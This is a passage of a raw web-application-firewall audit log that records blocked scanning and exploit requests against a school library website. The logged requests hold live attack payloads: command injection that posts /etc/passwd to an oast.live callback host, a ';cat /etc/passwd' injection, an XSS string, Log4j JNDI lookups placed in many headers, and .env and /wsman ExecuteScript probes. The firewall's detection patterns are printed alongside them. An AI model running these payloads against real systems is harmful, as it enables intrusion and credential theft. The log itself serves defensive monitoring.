"CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748314035409052 2026 (- - -) Stopwatch2: 1748314035409052 2026; combined=624, p1=495, p2=100, p3=0, p4=0, p5=28, sr=140, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54e3e61b-Z-- --5fc0f02d-A-- [27/May/2025:09:58:19 +0700] aDUqS2TuEZUBy5rh0saCtAAAABQ 103.236.140.4 48716 103.236.140.4 8181 --5fc0f02d-B-- GET /api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20d0q9cd1gpeook7mlf7sgmbas4u6frnx6o.oast.live) HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166620536 --5fc0f02d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5fc0f02d-E-- --5fc0f02d-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20d0q9cd1gpeook7mlf7sgmbas4u6frnx6o.oast.live)"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748314699501190 1997 (- - -) Stopwatch2: 1748314699501190 1997; combined=591, p1=363, p2=163, p3=0, p4=0, p5=65, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5fc0f02d-Z-- --1e1d2c1b-A-- [27/May/2025:09:58:19 +0700] aDUqS2TuEZUBy5rh0saCswAAAAk 103.236.140.4 48698 103.236.140.4 8181 --1e1d2c1b-B-- GET /public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 163550270 --1e1d2c1b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1e1d2c1b-E-- --1e1d2c1b-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\bon(?:abort|blur|change|click|dblclick|dragdrop|error|focus|keydown|keypress|keyup|load|mouse(?:down|move|out|over|up)|move|readystatechange|reset|resize|select|submit|unload)\\b[^a-zA-Z0-9_]{0,}?=" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "69"] [id "212750"] [rev "3"] [msg "COMODO WAF: XSS Attack Detected||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: onerror= found within REQUEST_URI: /public/error.jsp?errcode=\x22>"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748314699500688 2647 (- - -) Stopwatch2: 1748314699500688 2647; combined=1394, p1=395, p2=972, p3=0, p4=0, p5=27, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e1d2c1b-Z-- --e1c50b2c-A-- [27/May/2025:09:58:19 +0700] aDUqS1uSH_Spa4YU2ZmwmgAAANM 103.236.140.4 48718 103.236.140.4 8181 --e1c50b2c-B-- GET /cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164577510 --e1c50b2c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e1c50b2c-E-- --e1c50b2c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: cgi-script Stopwatch: 1748314699518895 1669 (- - -) Stopwatch2: 1748314699518895 1669; combined=505, p1=370, p2=106, p3=0, p4=0, p5=28, sr=71, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1c50b2c-Z-- --83262a70-A-- [27/May/2025:10:12:06 +0700] aDUthluSH_Spa4YU2ZmwoAAAAMQ 103.236.140.4 48840 103.236.140.4 8181 --83262a70-B-- GET /cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164577519 --83262a70-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --83262a70-E-- --83262a70-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: cgi-script Stopwatch: 1748315526097985 1525 (- - -) Stopwatch2: 1748315526097985 1525; combined=444, p1=317, p2=91, p3=0, p4=0, p5=36, sr=59, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83262a70-Z-- --43b9a463-A-- [27/May/2025:10:12:06 +0700] aDUthluSH_Spa4YU2ZmwoQAAAMM 103.236.140.4 48840 103.236.140.4 8181 --43b9a463-B-- GET /api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20d0q9cd1gpeook7mlf7sgwyowya8y8917d.oast.live) HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168511616 --43b9a463-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --43b9a463-E-- --43b9a463-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20d0q9cd1gpeook7mlf7sgwyowya8y8917d.oast.live)"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748315526115946 2027 (- - -) Stopwatch2: 1748315526115946 2027; combined=649, p1=488, p2=122, p3=0, p4=0, p5=38, sr=91, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43b9a463-Z-- --aa38525f-A-- [27/May/2025:10:12:07 +0700] aDUth1uSH_Spa4YU2ZmwowAAAMk 103.236.140.4 48852 103.236.140.4 8181 --aa38525f-B-- GET /public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164577525 --aa38525f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --aa38525f-E-- --aa38525f-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\bon(?:abort|blur|change|click|dblclick|dragdrop|error|focus|keydown|keypress|keyup|load|mouse(?:down|move|out|over|up)|move|readystatechange|reset|resize|select|submit|unload)\\b[^a-zA-Z0-9_]{0,}?=" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "69"] [id "212750"] [rev "3"] [msg "COMODO WAF: XSS Attack Detected||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: onerror= found within REQUEST_URI: /public/error.jsp?errcode=\x22>"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748315527095291 2513 (- - -) Stopwatch2: 1748315527095291 2513; combined=1041, p1=399, p2=609, p3=0, p4=0, p5=33, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa38525f-Z-- --d843c51d-A-- [27/May/2025:10:22:20 +0700] aDUv7N6cNBpj1JOkpQlTRAAAAEM 103.236.140.4 48954 103.236.140.4 8181 --d843c51d-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 206.81.24.74 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 206.81.24.74 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --d843c51d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d843c51d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748316140416432 780 (- - -) Stopwatch2: 1748316140416432 780; combined=305, p1=267, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d843c51d-Z-- --3fa8051b-A-- [27/May/2025:11:01:19 +0700] aDU5D2TuEZUBy5rh0saHmgAAABE 103.236.140.4 37174 103.236.140.4 8181 --3fa8051b-B-- POST /wsman HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 1709 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Type: application/soap+xml;charset=UTF-8 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 70849974 --3fa8051b-C-- HTTP://perpustakaan.smkn22jakarta.sch.id/wsman/ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript 102400 uuid:00B60932-CC01-0005-0000-000000010000 PT1M30S root/scx aWQ= 0 true --3fa8051b-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --3fa8051b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748318479373169 4307 (- - -) Stopwatch2: 1748318479373169 4307; combined=2931, p1=630, p2=2234, p3=20, p4=22, p5=25, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fa8051b-Z-- --9d62e711-A-- [27/May/2025:11:39:08 +0700] aDVB7BLFq2VRfSzm6b8bsAAAAJc 103.236.140.4 37694 103.236.140.4 8181 --9d62e711-B-- GET /?x=${jndi:ldap://${:-280}${:-987}.${hostName}.uri.d0qa44pgpeoi1bmoheag8u871rf5un6e4.oast.live/a} HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166620645 --9d62e711-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9d62e711-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748320748424209 5932 (- - -) Stopwatch2: 1748320748424209 5932; combined=3913, p1=482, p2=3399, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d62e711-Z-- --91984e2f-A-- [27/May/2025:11:39:11 +0700] aDVB7xLFq2VRfSzm6b8bsQAAAJY 103.236.140.4 37694 103.236.140.4 8181 --91984e2f-B-- GET / HTTP/1.1 Referer: ${jndi:ldap://${:-280}${:-987}.${hostName}.referer.d0qa44pgpeoi1bmoheagyk741zt5rh7on.oast.live} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: ${jndi:ldap://${:-280}${:-987}.${hostName}.useragent.d0qa44pgpeoi1bmoheagu8e9o7ccnja5e.oast.live} Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-280}${:-987}.${hostName}.accept.d0qa44pgpeoi1bmoheag1c9kt6rcoom3e.oast.live} Accept-Language: ${jndi:ldap://${:-280}${:-987}.${hostName}.acceptlanguage.d0qa44pgpeoi1bmoheagtwg81to9rmi3y.oast.live} Access-Control-Request-Headers: ${jndi:ldap://${:-280}${:-987}.${hostName}.accesscontrolrequestheaders.d0qa44pgpeoi1bmoheag8yw1szfa1n1iw.oast.live} Access-Control-Request-Method: ${jndi:ldap://${:-280}${:-987}.${hostName}.accesscontrolrequestmethod.d0qa44pgpeoi1bmoheags8zqn7djzdat1.oast.live} Authentication: Bearer ${jndi:ldap://${:-280}${:-987}.${hostName}.authenticationbearer.d0qa44pgpeoi1bmoheags147cm56macjw.oast.live} Location: ${jndi:ldap://${:-280}${:-987}.${hostName}.location.d0qa44pgpeoi1bmoheagbcrdjznywuc1k.oast.live} Origin: ${jndi:ldap://${:-280}${:-987}.${hostName}.origin.d0qa44pgpeoi1bmoheagcockby1dsou9h.oast.live} Upgrade-Insecure-Requests: ${jndi:ldap://${:-280}${:-987}.${hostName}.upgradeinsecurerequests.d0qa44pgpeoi1bmoheagne11cdih47bjx.oast.live} X-Api-Version: ${jndi:ldap://${:-280}${:-987}.${hostName}.xapiversion.d0qa44pgpeoi1bmoheagpk4i3s5fj7q7i.oast.live} X-CSRF-Token: ${jndi:ldap://${:-280}${:-987}.${hostName}.xcsrftoken.d0qa44pgpeoi1bmoheagindf69fm6tir9.oast.live} X-Druid-Comment: ${jndi:ldap://${:-280}${:-987}.${hostName}.xdruidcomment.d0qa44pgpeoi1bmoheagrtf7n8sgifdab.oast.live} X-Origin: ${jndi:ldap://${:-280}${:-987}.${hostName}.xorigin.d0qa44pgpeoi1bmoheagb3453t83a8hqe.oast.live} Cookie: ${jndi:ldap://${:-280}${:-987}.${hostName}.cookiename.d0qa44pgpeoi1bmoheagkne3pm66t9orh.oast.live}=${jndi:ldap://${:-280}${:-987}.${hostName}.cookievalue.d0qa44pgpeoi1bmoheagegutnx931insq.oast.live} X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166620648 --91984e2f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --91984e2f-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at REQUEST_HEADERS:Referer. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748320751406097 5284 (- - -) Stopwatch2: 1748320751406097 5284; combined=3768, p1=450, p2=3275, p3=0, p4=0, p5=42, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91984e2f-Z-- --0855ec3d-A-- [27/May/2025:12:20:28 +0700] aDVLnGTuEZUBy5rh0saHvQAAAAk 103.236.140.4 38396 103.236.140.4 8181 --0855ec3d-B-- POST /wsman HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 1709 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Content-Type: application/soap+xml;charset=UTF-8 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 160587906 --0855ec3d-C-- HTTP://perpustakaan.smkn22jakarta.sch.id/wsman/ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript 102400 uuid:00B60932-CC01-0005-0000-000000010000 PT1M30S root/scx aWQ= 0 true --0855ec3d-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --0855ec3d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748323228423445 3179 (- - -) Stopwatch2: 1748323228423445 3179; combined=2088, p1=451, p2=1559, p3=20, p4=32, p5=26, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0855ec3d-Z-- --dddb026e-A-- [27/May/2025:12:28:52 +0700] aDVNlFuSH_Spa4YU2Zm0swAAAMI 103.236.140.4 38466 103.236.140.4 8181 --dddb026e-B-- GET /?x=${jndi:ldap://${:-280}${:-987}.${hostName}.uri.d0qa44pgpeoi1bmoheag1rx389fwy84qz.oast.live/a} HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Knoppix; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164577971 --dddb026e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --dddb026e-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748323732406634 5743 (- - -) Stopwatch2: 1748323732406634 5743; combined=3797, p1=517, p2=3248, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dddb026e-Z-- --f0e6641c-A-- [27/May/2025:12:28:57 +0700] aDVNmVuSH_Spa4YU2Zm0tAAAAMA 103.236.140.4 38466 103.236.140.4 8181 --f0e6641c-B-- GET / HTTP/1.1 Referer: ${jndi:ldap://${:-280}${:-987}.${hostName}.referer.d0qa44pgpeoi1bmoheagb3gm13ynpdjh3.oast.live} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: ${jndi:ldap://${:-280}${:-987}.${hostName}.useragent.d0qa44pgpeoi1bmoheagxsdkok5qo45by.oast.live} Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-280}${:-987}.${hostName}.accept.d0qa44pgpeoi1bmoheaguqbjbsp71i413.oast.live} Accept-Language: ${jndi:ldap://${:-280}${:-987}.${hostName}.acceptlanguage.d0qa44pgpeoi1bmoheag4tth6j7ikxcxi.oast.live} Access-Control-Request-Headers: ${jndi:ldap://${:-280}${:-987}.${hostName}.accesscontrolrequestheaders.d0qa44pgpeoi1bmoheagh95qjhcuzhkq8.oast.live} Access-Control-Request-Method: ${jndi:ldap://${:-280}${:-987}.${hostName}.accesscontrolrequestmethod.d0qa44pgpeoi1bmoheagb8hy3y5y4snx5.oast.live} Authentication: Bearer ${jndi:ldap://${:-280}${:-987}.${hostName}.authenticationbearer.d0qa44pgpeoi1bmoheagr6sqsbbfoshwh.oast.live} Location: ${jndi:ldap://${:-280}${:-987}.${hostName}.location.d0qa44pgpeoi1bmoheagpw9wf5npai9mr.oast.live} Origin: ${jndi:ldap://${:-280}${:-987}.${hostName}.origin.d0qa44pgpeoi1bmoheagj7cqco8bizgfd.oast.live} Upgrade-Insecure-Requests: ${jndi:ldap://${:-280}${:-987}.${hostName}.upgradeinsecurerequests.d0qa44pgpeoi1bmoheagh1tqrokfrefrq.oast.live} X-Api-Version: ${jndi:ldap://${:-280}${:-987}.${hostName}.xapiversion.d0qa44pgpeoi1bmoheagpc9h14cejmgma.oast.live} X-CSRF-Token: ${jndi:ldap://${:-280}${:-987}.${hostName}.xcsrftoken.d0qa44pgpeoi1bmoheage3w9f9i1pbqzf.oast.live} X-Druid-Comment: ${jndi:ldap://${:-280}${:-987}.${hostName}.xdruidcomment.d0qa44pgpeoi1bmoheag7qa4gjmzidfhy.oast.live} X-Origin: ${jndi:ldap://${:-280}${:-987}.${hostName}.xorigin.d0qa44pgpeoi1bmoheagn49wbosg8riy8.oast.live} Cookie: 